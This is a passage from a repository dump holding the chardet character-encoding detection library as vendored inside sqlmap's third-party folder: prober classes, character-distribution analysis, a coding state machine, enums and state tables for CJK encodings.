Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import Big5DistributionAnalysis\nfrom .mbcssm import BIG5_SM_MODEL\n\n\nclass Big5Prober(MultiByteCharSetProber):\n    def __init__(self):\n        super(Big5Prober, self).__init__()\n        self.coding_sm = CodingStateMachine(BIG5_SM_MODEL)\n        self.distribution_analyzer = Big5DistributionAnalysis()\n        self.reset()\n\n    @property\n    def charset_name(self):\n        return \"Big5\"\n\n    @property\n    def language(self):\n        return \"Chinese\"\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/chardistribution.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .euctwfreq import (EUCTW_CHAR_TO_FREQ_ORDER, EUCTW_TABLE_SIZE,\n                        EUCTW_TYPICAL_DISTRIBUTION_RATIO)\nfrom .euckrfreq import (EUCKR_CHAR_TO_FREQ_ORDER, EUCKR_TABLE_SIZE,\n                        EUCKR_TYPICAL_DISTRIBUTION_RATIO)\nfrom .gb2312freq import (GB2312_CHAR_TO_FREQ_ORDER, GB2312_TABLE_SIZE,\n                         GB2312_TYPICAL_DISTRIBUTION_RATIO)\nfrom .big5freq import (BIG5_CHAR_TO_FREQ_ORDER, BIG5_TABLE_SIZE,\n                       BIG5_TYPICAL_DISTRIBUTION_RATIO)\nfrom .jisfreq import (JIS_CHAR_TO_FREQ_ORDER, JIS_TABLE_SIZE,\n                      JIS_TYPICAL_DISTRIBUTION_RATIO)\n\n\nclass CharDistributionAnalysis(object):\n    ENOUGH_DATA_THRESHOLD = 1024\n    SURE_YES = 0.99\n    SURE_NO = 0.01\n    MINIMUM_DATA_THRESHOLD = 3\n\n    def __init__(self):\n        # Mapping table to get frequency order from char order (get from\n        # GetOrder())\n        self._char_to_freq_order = None\n        self._table_size = None  # Size of above table\n        # This is a constant value which varies from language to language,\n        # used in calculating confidence.  See\n        # http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html\n        # for further detail.\n        self.typical_distribution_ratio = None\n        self._done = None\n        self._total_chars = None\n        self._freq_chars = None\n        self.reset()\n\n    def reset(self):\n        \"\"\"reset analyser, clear any state\"\"\"\n        # If this flag is set to True, detection is done and conclusion has\n        # been made\n        self._done = False\n        self._total_chars = 0  # Total characters encountered\n        # The number of characters whose frequency order is less than 512\n        self._freq_chars = 0\n\n    def feed(self, char, char_len):\n        \"\"\"feed a character with known length\"\"\"\n        if char_len == 2:\n            # we only care about 2-bytes character in our distribution analysis\n            order = self.get_order(char)\n        else:\n            order = -1\n        if order >= 0:\n            self._total_chars += 1\n            # order is valid\n            if order < self._table_size:\n                if 512 > self._char_to_freq_order[order]:\n                    self._freq_chars += 1\n\n    def get_confidence(self):\n        \"\"\"return confidence based on existing data\"\"\"\n        # if we didn't receive any character in our consideration range,\n        # return negative answer\n        if self._total_chars <= 0 or self._freq_chars <= self.MINIMUM_DATA_THRESHOLD:\n            return self.SURE_NO\n\n        if self._total_chars != self._freq_chars:\n            r = (self._freq_chars / ((self._total_chars - self._freq_chars)\n                 * self.typical_distribution_ratio))\n            if r < self.SURE_YES:\n                return r\n\n        # normalize confidence (we don't want to be 100% sure)\n        return self.SURE_YES\n\n    def got_enough_data(self):\n        # It is not necessary to receive all data to draw conclusion.\n        # For charset detection, certain amount of data is enough\n        return self._total_chars > self.ENOUGH_DATA_THRESHOLD\n\n    def get_order(self, byte_str):\n        # We do not handle characters based on the original encoding string,\n        # but convert this encoding string to a number, here called order.\n        # This allows multiple encodings of a language to share one frequency\n        # table.\n        return -1\n\n\nclass EUCTWDistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(EUCTWDistributionAnalysis, self).__init__()\n        self._char_to_freq_order = EUCTW_CHAR_TO_FREQ_ORDER\n        self._table_size = EUCTW_TABLE_SIZE\n        self.typical_distribution_ratio = EUCTW_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for euc-TW encoding, we are interested\n        #   first  byte range: 0xc4 -- 0xfe\n        #   second byte range: 0xa1 -- 0xfe\n        # no validation needed here. State machine has done that\n        first_char = byte_str[0]\n        if first_char >= 0xC4:\n            return 94 * (first_char - 0xC4) + byte_str[1] - 0xA1\n        else:\n            return -1\n\n\nclass EUCKRDistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(EUCKRDistributionAnalysis, self).__init__()\n        self._char_to_freq_order = EUCKR_CHAR_TO_FREQ_ORDER\n        self._table_size = EUCKR_TABLE_SIZE\n        self.typical_distribution_ratio = EUCKR_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for euc-KR encoding, we are interested\n        #   first  byte range: 0xb0 -- 0xfe\n        #   second byte range: 0xa1 -- 0xfe\n        # no validation needed here. State machine has done that\n        first_char = byte_str[0]\n        if first_char >= 0xB0:\n            return 94 * (first_char - 0xB0) + byte_str[1] - 0xA1\n        else:\n            return -1\n\n\nclass GB2312DistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(GB2312DistributionAnalysis, self).__init__()\n        self._char_to_freq_order = GB2312_CHAR_TO_FREQ_ORDER\n        self._table_size = GB2312_TABLE_SIZE\n        self.typical_distribution_ratio = GB2312_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for GB2312 encoding, we are interested\n        #  first  byte range: 0xb0 -- 0xfe\n        #  second byte range: 0xa1 -- 0xfe\n        # no validation needed here. State machine has done that\n        first_char, second_char = byte_str[0], byte_str[1]\n        if (first_char >= 0xB0) and (second_char >= 0xA1):\n            return 94 * (first_char - 0xB0) + second_char - 0xA1\n        else:\n            return -1\n\n\nclass Big5DistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(Big5DistributionAnalysis, self).__init__()\n        self._char_to_freq_order = BIG5_CHAR_TO_FREQ_ORDER\n        self._table_size = BIG5_TABLE_SIZE\n        self.typical_distribution_ratio = BIG5_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for big5 encoding, we are interested\n        #   first  byte range: 0xa4 -- 0xfe\n        #   second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe\n        # no validation needed here. State machine has done that\n        first_char, second_char = byte_str[0], byte_str[1]\n        if first_char >= 0xA4:\n            if second_char >= 0xA1:\n                return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63\n            else:\n                return 157 * (first_char - 0xA4) + second_char - 0x40\n        else:\n            return -1\n\n\nclass SJISDistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(SJISDistributionAnalysis, self).__init__()\n        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER\n        self._table_size = JIS_TABLE_SIZE\n        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for sjis encoding, we are interested\n        #   first  byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe\n        #   second byte range: 0x40 -- 0x7e,  0x81 -- oxfe\n        # no validation needed here. State machine has done that\n        first_char, second_char = byte_str[0], byte_str[1]\n        if (first_char >= 0x81) and (first_char <= 0x9F):\n            order = 188 * (first_char - 0x81)\n        elif (first_char >= 0xE0) and (first_char <= 0xEF):\n            order = 188 * (first_char - 0xE0 + 31)\n        else:\n            return -1\n        order = order + second_char - 0x40\n        if second_char > 0x7F:\n            order = -1\n        return order\n\n\nclass EUCJPDistributionAnalysis(CharDistributionAnalysis):\n    def __init__(self):\n        super(EUCJPDistributionAnalysis, self).__init__()\n        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER\n        self._table_size = JIS_TABLE_SIZE\n        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO\n\n    def get_order(self, byte_str):\n        # for euc-JP encoding, we are interested\n        #   first  byte range: 0xa0 -- 0xfe\n        #   second byte range: 0xa1 -- 0xfe\n        # no validation needed here. State machine has done that\n        char = byte_str[0]\n        if char >= 0xA0:\n            return 94 * (char - 0xA1) + byte_str[1] - 0xa1\n        else:\n            return -1\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/charsetgroupprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .enums import ProbingState\nfrom .charsetprober import CharSetProber\n\n\nclass CharSetGroupProber(CharSetProber):\n    def __init__(self, lang_filter=None):\n        super(CharSetGroupProber, self).__init__(lang_filter=lang_filter)\n        self._active_num = 0\n        self.probers = []\n        self._best_guess_prober = None\n\n    def reset(self):\n        super(CharSetGroupProber, self).reset()\n        self._active_num = 0\n        for prober in self.probers:\n            if prober:\n                prober.reset()\n                prober.active = True\n                self._active_num += 1\n        self._best_guess_prober = None\n\n    @property\n    def charset_name(self):\n        if not self._best_guess_prober:\n            self.get_confidence()\n            if not self._best_guess_prober:\n                return None\n        return self._best_guess_prober.charset_name\n\n    @property\n    def language(self):\n        if not self._best_guess_prober:\n            self.get_confidence()\n            if not self._best_guess_prober:\n                return None\n        return self._best_guess_prober.language\n\n    def feed(self, byte_str):\n        for prober in self.probers:\n            if not prober:\n                continue\n            if not prober.active:\n                continue\n            state = prober.feed(byte_str)\n            if not state:\n                continue\n            if state == ProbingState.FOUND_IT:\n                self._best_guess_prober = prober\n                return self.state\n            elif state == ProbingState.NOT_ME:\n                prober.active = False\n                self._active_num -= 1\n                if self._active_num <= 0:\n                    self._state = ProbingState.NOT_ME\n                    return self.state\n        return self.state\n\n    def get_confidence(self):\n        state = self.state\n        if state == ProbingState.FOUND_IT:\n            return 0.99\n        elif state == ProbingState.NOT_ME:\n            return 0.01\n        best_conf = 0.0\n        self._best_guess_prober = None\n        for prober in self.probers:\n            if not prober:\n                continue\n            if not prober.active:\n                self.logger.debug('%s not active', prober.charset_name)\n                continue\n            conf = prober.get_confidence()\n            self.logger.debug('%s %s confidence = %s', prober.charset_name, prober.language, conf)\n            if best_conf < conf:\n                best_conf = conf\n                self._best_guess_prober = prober\n        if not self._best_guess_prober:\n            return 0.0\n        return best_conf\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/charsetprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nimport logging\nimport re\n\nfrom .enums import ProbingState\n\n\nclass CharSetProber(object):\n\n    SHORTCUT_THRESHOLD = 0.95\n\n    def __init__(self, lang_filter=None):\n        self._state = None\n        self.lang_filter = lang_filter\n        self.logger = logging.getLogger(__name__)\n\n    def reset(self):\n        self._state = ProbingState.DETECTING\n\n    @property\n    def charset_name(self):\n        return None\n\n    def feed(self, buf):\n        pass\n\n    @property\n    def state(self):\n        return self._state\n\n    def get_confidence(self):\n        return 0.0\n\n    @staticmethod\n    def filter_high_byte_only(buf):\n        buf = re.sub(b'([\\x00-\\x7F])+', b' ', buf)\n        return buf\n\n    @staticmethod\n    def filter_international_words(buf):\n        \"\"\"\n        We define three types of bytes:\n        alphabet: english alphabets [a-zA-Z]\n        international: international characters [\\x80-\\xFF]\n        marker: everything else [^a-zA-Z\\x80-\\xFF]\n\n        The input buffer can be thought to contain a series of words delimited\n        by markers. This function works to filter all words that contain at\n        least one international character. All contiguous sequences of markers\n        are replaced by a single space ascii character.\n\n        This filter applies to all scripts which do not use English characters.\n        \"\"\"\n        filtered = bytearray()\n\n        # This regex expression filters out only words that have at-least one\n        # international character. The word may include one marker character at\n        # the end.\n        words = re.findall(b'[a-zA-Z]*[\\x80-\\xFF]+[a-zA-Z]*[^a-zA-Z\\x80-\\xFF]?',\n                           buf)\n\n        for word in words:\n            filtered.extend(word[:-1])\n\n            # If the last character in the word is a marker, replace it with a\n            # space as markers shouldn't affect our analysis (they are used\n            # similarly across all languages and may thus have similar\n            # frequencies).\n            last_char = word[-1:]\n            if not last_char.isalpha() and last_char < b'\\x80':\n                last_char = b' '\n            filtered.extend(last_char)\n\n        return filtered\n\n    @staticmethod\n    def filter_with_english_letters(buf):\n        \"\"\"\n        Returns a copy of ``buf`` that retains only the sequences of English\n        alphabet and high byte characters that are not between <> characters.\n        Also retains English alphabet and high byte characters immediately\n        before occurrences of >.\n\n        This filter can be applied to all scripts which contain both English\n        characters and extended ASCII characters, but is currently only used by\n        ``Latin1Prober``.\n        \"\"\"\n        filtered = bytearray()\n        in_tag = False\n        prev = 0\n\n        for curr in range(len(buf)):\n            # Slice here to get bytes instead of an int with Python 3\n            buf_char = buf[curr:curr + 1]\n            # Check if we're coming out of or entering an HTML tag\n            if buf_char == b'>':\n                in_tag = False\n            elif buf_char == b'<':\n                in_tag = True\n\n            # If current character is not extended-ASCII and not alphabetic...\n            if buf_char < b'\\x80' and not buf_char.isalpha():\n                # ...and we're not in a tag\n                if curr > prev and not in_tag:\n                    # Keep everything after last non-extended-ASCII,\n                    # non-alphabetic character\n                    filtered.extend(buf[prev:curr])\n                    # Output a space to delimit stretch we kept\n                    filtered.extend(b' ')\n                prev = curr + 1\n\n        # If we're not in a tag...\n        if not in_tag:\n            # Keep everything after last non-extended-ASCII, non-alphabetic\n            # character\n            filtered.extend(buf[prev:])\n\n        return filtered\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/codingstatemachine.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nimport logging\n\nfrom .enums import MachineState\n\n\nclass CodingStateMachine(object):\n    \"\"\"\n    A state machine to verify a byte sequence for a particular encoding. For\n    each byte the detector receives, it will feed that byte to every active\n    state machine available, one byte at a time. The state machine changes its\n    state based on its previous state and the byte it receives. There are 3\n    states in a state machine that are of interest to an auto-detector:\n\n    START state: This is the state to start with, or a legal byte sequence\n                 (i.e. a valid code point) for character has been identified.\n\n    ME state:  This indicates that the state machine identified a byte sequence\n               that is specific to the charset it is designed for and that\n               there is no other possible encoding which can contain this byte\n               sequence. This will to lead to an immediate positive answer for\n               the detector.\n\n    ERROR state: This indicates the state machine identified an illegal byte\n                 sequence for that encoding. This will lead to an immediate\n                 negative answer for this encoding. Detector will exclude this\n                 encoding from consideration from here on.\n    \"\"\"\n    def __init__(self, sm):\n        self._model = sm\n        self._curr_byte_pos = 0\n        self._curr_char_len = 0\n        self._curr_state = None\n        self.logger = logging.getLogger(__name__)\n        self.reset()\n\n    def reset(self):\n        self._curr_state = MachineState.START\n\n    def next_state(self, c):\n        # for each byte we get its class\n        # if it is first byte, we also get byte length\n        byte_class = self._model['class_table'][c]\n        if self._curr_state == MachineState.START:\n            self._curr_byte_pos = 0\n            self._curr_char_len = self._model['char_len_table'][byte_class]\n        # from byte's class and state_table, we get its next state\n        curr_state = (self._curr_state * self._model['class_factor']\n                      + byte_class)\n        self._curr_state = self._model['state_table'][curr_state]\n        self._curr_byte_pos += 1\n        return self._curr_state\n\n    def get_current_charlen(self):\n        return self._curr_char_len\n\n    def get_coding_state_machine(self):\n        return self._model['name']\n\n    @property\n    def language(self):\n        return self._model['language']\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/compat.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# Contributor(s):\n#   Dan Blanchard\n#   Ian Cordasco\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nimport sys\n\n\nif sys.version_info < (3, 0):\n    PY2 = True\n    PY3 = False\n    base_str = (str, unicode)\n    text_type = unicode\nelse:\n    PY2 = False\n    PY3 = True\n    base_str = (bytes, str)\n    text_type = str\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/cp949prober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .chardistribution import EUCKRDistributionAnalysis\nfrom .codingstatemachine import CodingStateMachine\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .mbcssm import CP949_SM_MODEL\n\n\nclass CP949Prober(MultiByteCharSetProber):\n    def __init__(self):\n        super(CP949Prober, self).__init__()\n        self.coding_sm = CodingStateMachine(CP949_SM_MODEL)\n        # NOTE: CP949 is a superset of EUC-KR, so the distribution should be\n        #       not different.\n        self.distribution_analyzer = EUCKRDistributionAnalysis()\n        self.reset()\n\n    @property\n    def charset_name(self):\n        return \"CP949\"\n\n    @property\n    def language(self):\n        return \"Korean\"\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/enums.py",
    "content": "\"\"\"\nAll of the Enums that are used throughout the chardet package.\n\n:author: Dan Blanchard (dan.blanchard@gmail.com)\n\"\"\"\n\n\nclass InputState(object):\n    \"\"\"\n    This enum represents the different states a universal detector can be in.\n    \"\"\"\n    PURE_ASCII = 0\n    ESC_ASCII = 1\n    HIGH_BYTE = 2\n\n\nclass LanguageFilter(object):\n    \"\"\"\n    This enum represents the different language filters we can apply to a\n    ``UniversalDetector``.\n    \"\"\"\n    CHINESE_SIMPLIFIED = 0x01\n    CHINESE_TRADITIONAL = 0x02\n    JAPANESE = 0x04\n    KOREAN = 0x08\n    NON_CJK = 0x10\n    ALL = 0x1F\n    CHINESE = CHINESE_SIMPLIFIED | CHINESE_TRADITIONAL\n    CJK = CHINESE | JAPANESE | KOREAN\n\n\nclass ProbingState(object):\n    \"\"\"\n    This enum represents the different states a prober can be in.\n    \"\"\"\n    DETECTING = 0\n    FOUND_IT = 1\n    NOT_ME = 2\n\n\nclass MachineState(object):\n    \"\"\"\n    This enum represents the different states a state machine can be in.\n    \"\"\"\n    START = 0\n    ERROR = 1\n    ITS_ME = 2\n\n\nclass SequenceLikelihood(object):\n    \"\"\"\n    This enum represents the likelihood of a character following the previous one.\n    \"\"\"\n    NEGATIVE = 0\n    UNLIKELY = 1\n    LIKELY = 2\n    POSITIVE = 3\n\n    @classmethod\n    def get_num_categories(cls):\n        \"\"\":returns: The number of likelihood categories in the enum.\"\"\"\n        return 4\n\n\nclass CharacterCategory(object):\n    \"\"\"\n    This enum represents the different categories language models for\n    ``SingleByteCharsetProber`` put characters into.\n\n    Anything less than CONTROL is considered a letter.\n    \"\"\"\n    UNDEFINED = 255\n    LINE_BREAK = 254\n    SYMBOL = 253\n    DIGIT = 252\n    CONTROL = 251\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/escprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .enums import LanguageFilter, ProbingState, MachineState\nfrom .escsm import (HZ_SM_MODEL, ISO2022CN_SM_MODEL, ISO2022JP_SM_MODEL,\n                    ISO2022KR_SM_MODEL)\n\n\nclass EscCharSetProber(CharSetProber):\n    \"\"\"\n    This CharSetProber uses a \"code scheme\" approach for detecting encodings,\n    whereby easily recognizable escape or shift sequences are relied on to\n    identify these encodings.\n    \"\"\"\n\n    def __init__(self, lang_filter=None):\n        super(EscCharSetProber, self).__init__(lang_filter=lang_filter)\n        self.coding_sm = []\n        if self.lang_filter & LanguageFilter.CHINESE_SIMPLIFIED:\n            self.coding_sm.append(CodingStateMachine(HZ_SM_MODEL))\n            self.coding_sm.append(CodingStateMachine(ISO2022CN_SM_MODEL))\n        if self.lang_filter & LanguageFilter.JAPANESE:\n            self.coding_sm.append(CodingStateMachine(ISO2022JP_SM_MODEL))\n        if self.lang_filter & LanguageFilter.KOREAN:\n            self.coding_sm.append(CodingStateMachine(ISO2022KR_SM_MODEL))\n        self.active_sm_count = None\n        self._detected_charset = None\n        self._detected_language = None\n        self._state = None\n        self.reset()\n\n    def reset(self):\n        super(EscCharSetProber, self).reset()\n        for coding_sm in self.coding_sm:\n            if not coding_sm:\n                continue\n            coding_sm.active = True\n            coding_sm.reset()\n        self.active_sm_count = len(self.coding_sm)\n        self._detected_charset = None\n        self._detected_language = None\n\n    @property\n    def charset_name(self):\n        return self._detected_charset\n\n    @property\n    def language(self):\n        return self._detected_language\n\n    def get_confidence(self):\n        if self._detected_charset:\n            return 0.99\n        else:\n            return 0.00\n\n    def feed(self, byte_str):\n        for c in byte_str:\n            for coding_sm in self.coding_sm:\n                if not coding_sm or not coding_sm.active:\n                    continue\n                coding_state = coding_sm.next_state(c)\n                if coding_state == MachineState.ERROR:\n                    coding_sm.active = False\n                    self.active_sm_count -= 1\n                    if self.active_sm_count <= 0:\n                        self._state = ProbingState.NOT_ME\n                        return self.state\n                elif coding_state == MachineState.ITS_ME:\n                    self._state = ProbingState.FOUND_IT\n                    self._detected_charset = coding_sm.get_coding_state_machine()\n                    self._detected_language = coding_sm.language\n                    return self.state\n\n        return self.state\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/escsm.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .enums import MachineState\n\nHZ_CLS = (\n1,0,0,0,0,0,0,0,  # 00 - 07\n0,0,0,0,0,0,0,0,  # 08 - 0f\n0,0,0,0,0,0,0,0,  # 10 - 17\n0,0,0,1,0,0,0,0,  # 18 - 1f\n0,0,0,0,0,0,0,0,  # 20 - 27\n0,0,0,0,0,0,0,0,  # 28 - 2f\n0,0,0,0,0,0,0,0,  # 30 - 37\n0,0,0,0,0,0,0,0,  # 38 - 3f\n0,0,0,0,0,0,0,0,  # 40 - 47\n0,0,0,0,0,0,0,0,  # 48 - 4f\n0,0,0,0,0,0,0,0,  # 50 - 57\n0,0,0,0,0,0,0,0,  # 58 - 5f\n0,0,0,0,0,0,0,0,  # 60 - 67\n0,0,0,0,0,0,0,0,  # 68 - 6f\n0,0,0,0,0,0,0,0,  # 70 - 77\n0,0,0,4,0,5,2,0,  # 78 - 7f\n1,1,1,1,1,1,1,1,  # 80 - 87\n1,1,1,1,1,1,1,1,  # 88 - 8f\n1,1,1,1,1,1,1,1,  # 90 - 97\n1,1,1,1,1,1,1,1,  # 98 - 9f\n1,1,1,1,1,1,1,1,  # a0 - a7\n1,1,1,1,1,1,1,1,  # a8 - af\n1,1,1,1,1,1,1,1,  # b0 - b7\n1,1,1,1,1,1,1,1,  # b8 - bf\n1,1,1,1,1,1,1,1,  # c0 - c7\n1,1,1,1,1,1,1,1,  # c8 - cf\n1,1,1,1,1,1,1,1,  # d0 - d7\n1,1,1,1,1,1,1,1,  # d8 - df\n1,1,1,1,1,1,1,1,  # e0 - e7\n1,1,1,1,1,1,1,1,  # e8 - ef\n1,1,1,1,1,1,1,1,  # f0 - f7\n1,1,1,1,1,1,1,1,  # f8 - ff\n)\n\nHZ_ST = (\nMachineState.START,MachineState.ERROR,     3,MachineState.START,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,# 00-07\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,# 08-0f\nMachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.START,MachineState.START,     4,MachineState.ERROR,# 10-17\n     5,MachineState.ERROR,     6,MachineState.ERROR,     5,     5,     4,MachineState.ERROR,# 18-1f\n     4,MachineState.ERROR,     4,     4,     4,MachineState.ERROR,     4,MachineState.ERROR,# 20-27\n     4,MachineState.ITS_ME,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,# 